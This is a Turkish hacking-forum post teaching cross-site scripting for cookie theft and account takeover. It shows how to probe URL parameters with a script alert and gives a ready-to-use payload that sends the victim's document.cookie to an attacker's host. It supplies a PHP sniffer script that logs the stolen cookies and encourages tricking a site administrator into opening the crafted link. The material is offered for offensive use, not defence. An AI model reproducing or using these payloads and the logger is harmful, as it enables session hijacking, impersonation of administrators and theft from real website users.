Selam Arkadaşlar Bu sitedeki ilk msjım bu konuya nasip oldu Arkadaşında dedigi gibi bilmek gerekli Ve bende dilim döndügünce anlatmaya çalışacagım yanlışım olursa düzeltin lütfen
Cross Site Scripting
Adında Belli oldugu gibi Scriptlerle Oynama Olayıdır. Saldirgan kişi yada kişilerin Scriptlerle Oynanılarak Yapılan Bir Hack Çeşitidir. Saldırgan, Sitede Bulunan Herhangi Bir Yere Bir Script Kodu (Java,Html Vs...) Ekleyerek, Kullanıcılara Ait Bilgileri Çalmayı Hedefleyen Bir Saldırı Çeşitidir.
xss Açığı Nasıl Bulunur ?
Nasıl Bulunduğuna Başlamadan Önce Hem Mail xss Hemde Web Deface İçin xss Bir Sitenin Her Yerinde Olabilir Örneğin Üyelik Sisteminin Olduğu Kısımlar Vs... ( Unutmayınki Heryerinde Olabilir ) Kısacası Script Parametrelerinin Olduğu Her Yerde xss Açığı Olabilir...Bunun İçin Programlarda Mevcuttur Ama Benim Görüşüm En İyisi Manuel ( Eller ) Olarak Yapmaktır
xss'nin Ana Mantığı Site Üzerinde Javascript Kodlarını Çalmaktır... Bilindiği Üzere Web Deface İçinde Süper Bir Yöntemdir... Arkadaşın aksine ben halen daha kullanılacagını düşünüyorum
Örneğin Web Site Üzerinde Deniyeceğiz Javascript Codlarıyla Admin Cookisi Çalabilir Onun Kimliği İle Siteye Giriş Yapabilir Dilediğinizi Yapabilirsiniz... Şimdi Bir Çoğunuzun AKlına Cookie Nedir Diye Aklınıza Gelmiyor Değildir Hani El Atmışkan Bu Konuya Cookie Olayınada Değinelim.Cookie Nedir Onuda Öğretelim...
Öncelikle Cookie Nedir Ne İşe Yarar ?
Cookie Kelimesi "Web Sayfası Sunucusunun Sizin Bilgisayarınızın Hard Diskine Yerleştirdiği Ufak Bir Text Dosyası" için Kullanılmaktadır. Yani, o Web Sitesinin Sizin Bir Sonraki Ziyarette Sizi Tanıması İçin Geçerli Bir Bilgidir. Bu Text Dosyası Bir komut Dosyası Olmadığı Gibi, Virüs de Değildir. Size Özel Bir Tanımlamadır Ve Sadece Bu Kodu Tanımlayan Web Sunucusu Tarafından Okunabilir.
Cookie'nin Amacı; Sizin o Siteyi Yeniden Ziyaret Ettiğinizi Web Sunucuya Bildirmekten İbarettir.
Ne İşe Yarar ; Sizi Zaman Kaybından Korur Kendinize Kişselleştirdiğiniz Bir Sayfanız Varsa Bu Cookiler Sizi Hatırlar.Bir Web Sayfasına Bir Sonraki Dönüşünüzde İstediğiniz Bilgiler Ekrana Gelir ( Şifrenisin Otomatik Hatırlanması Gibi )
Evet Cooki'yide Açıkladığımıza Göre Şimdi Kaldığımız Yerden Devam Edebiliriz...
xss Açığını Bulmaya Geldi Sıra :
Şimdi Hedeflediğimiz Sistemde İyice Bir Göz Gezdirelim Ayrıntılarını Gözden Kaçırmıyalım { Bunların Hepsi Tabi Url ( Adres ) Kısmında Olucaktır }
Site Url ( Adres ) Kısmında = Bu Parametreyi Gördünüz Her Yeri Yanınızamı Not ALırsınız Yoksa İyi Bir Ezbercimisiniz Orası Size Kalmış Çünkü Biraz Sonra = Bu Paremetreyi Gördüğünüz Yerler Sizlere Lazım Olucak...
Hedeflediğimiz Sistem Örneğin Şu Olsun
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir. Üye Olmak İçin Tıklayın...]
= Parametresinin Sonuna Javascript Kodlarımızı Deneyip Cookie Hatası Verdirebilmektir.
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir. Üye Olmak İçin Tıklayın...] Burda 10 Kısmından Sonra
Www.Example.Com/xxx.Php?id=10"><Script>Alert(Saldirg@n)</Script> Bu Kodu Yazıp Enter Diyip Devam Deniyorsunuz Evet Karşınıza Değişik Bir Şeyler Çıktı
Üzerinde Saldirg@n Yazan Bir Sesli Uyarı Çıktı... Bu Uyarıyı Aldığınız An Sitede xss Açığını Yakalamayı Başardınız Demektir. Olay Bu Kadarla Sınırlı Değil Bu Olay Mailler İçinde Geçerli
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir. Üye Olmak İçin Tıklayın...] /Xxxx.Aspx?id=1879 Böle Bir Url Var Karşınızda Diyelim ( Arkadaşlar Bu Url'lerin Hepsini Kafamdan Uydurdum Bunlar Üzerinde Deneme Yapmayın ) Evet Hedeflediğimiz Web Sistemine Yaptığımızın Aynısını Mail Sitemine De Yapıyoruz Aynı Hatayı Aldığınız An Bilinki Mail xss Yakalamış Oldunuz...
Arkadaşlar Mail xss Yakalamış Olduğunuz Yer İçin ( Sadece Mail İçin Geçerli Değil Bu Yapacağımız İşlemler Hedeflediğimiz Web Sistemimiz İçinde Geçerli )
xss Yi Yakalamış Olduğumuz Sistemler İçin Yapılması Gerekenler :
1) Bulduğumuz Açığa Cookie Sömürücü Kodu Ekliyoruz
2) Cookilerin Bizim ELimize Ulaşması İçin Cookie Sniffer Hazırlıyoruz
3) En Son İşlemimizde Hedefe Yedirtmek Kalıyor Orasıda Size Kalmı
*** Şimdi Burayı İyi Okuyun
Açığı Bulduğumuz Url :
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir. Üye Olmak İçin Tıklayın...] Buraya Sömürücü Kodumuzu Ekliyoruz
Sömürücü Kodumuz : "><Script>Windows.Location="Http://Www.Sizinadres.Com/Cookie.Php?Cookie="+Document.Cookie;</Script> (
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir. Üye Olmak İçin Tıklayın...] Yerine Kendi Sisteminizin Adını Geçirin )
Yedirilecek Kod : Www.Example.Com/xxx.Php?id=10"><Script>Windows.Location="Http://Www.Sizinadres.Com/Cookie.Php?Cookie="+Document.Cookie;</Script> Evet Bunu Admine Yedirmek Artık Sizin Kabiliyetinize Kalmış Bir Şey...
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir. Üye Olmak İçin Tıklayın...] Arkadaşlar Buraya Cookieler Gelicektir...
Burasıda Gelecek Cookilerin Yazılmasını Sağlayan Ve Bir Host İçine Attığınız Sniffer Dosyasıdır...
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir. Üye Olmak İçin Tıklayın...] Sistem Adresiniz.Com/Cookie.Php
2) İşleme Geçiyoruz...
Bunlar Tamamsa Şimdi Sizlere Sniffer Hazırlıyalım ; Benim Kullandığım Kodları Aynen Geçiyorum Buraya
<?Php
/"Saldirg@n Cookie Çalma Olayı */
/Bu Kodu Kendi Sisteminiz Varsa Oraya Yoksa Free Hosta Atın*/
$Cookie=$_Get['Cookie'];
$Log=Fopen("CookiesP.Txt","a");
Fwrite($Log,$Cookie."\\n");
Fclose($log);
?>
Şimdi Yukarıdaki Bir Notepad'e Yazıp Cookie.Php Olarak Kayıt Edin...Ardından Boş Bir Sayfa Daha Açıp Onada CookiesP.Txt Adını Veriyoruz Ve Bunları İster Kendi Sisteminize İstersenizde Free Bir Hosta Atın Size Kalmış Artık Orası
***** Not : Bu İki Klasöründe Yazma İzni Olması Lazım ( Chmod 777 ) Bunu Da Attığınız Zaman Hostunuza İster Programla Bağlanıp Yapın Chmod Ayarını İstersenizde Ftp Adresinize Girerek
3) En Zor Ve En Eğlenceli Kısım Karşıya Yedirmek Kalıyor Orasıda Size Kalsın Ama Basit Bir Örnek Vereyim İster Site Admininin Güvenini Kazanın İstersenizde Bulun Bir Oyun
Bu Döküman Tamamen Benim Tarafımdan Yazılmıştır Bunu BARIŞ ARKADAŞIMA Bir vefa borcu olarakta algılaya bilirsiniz Sagda solda yayınlamak yasak degil yayınlanmassa sevınırım
Forumta da Stenly
ıq da gölge
Forumtayfada Saldirg@n
Saygılarımla.....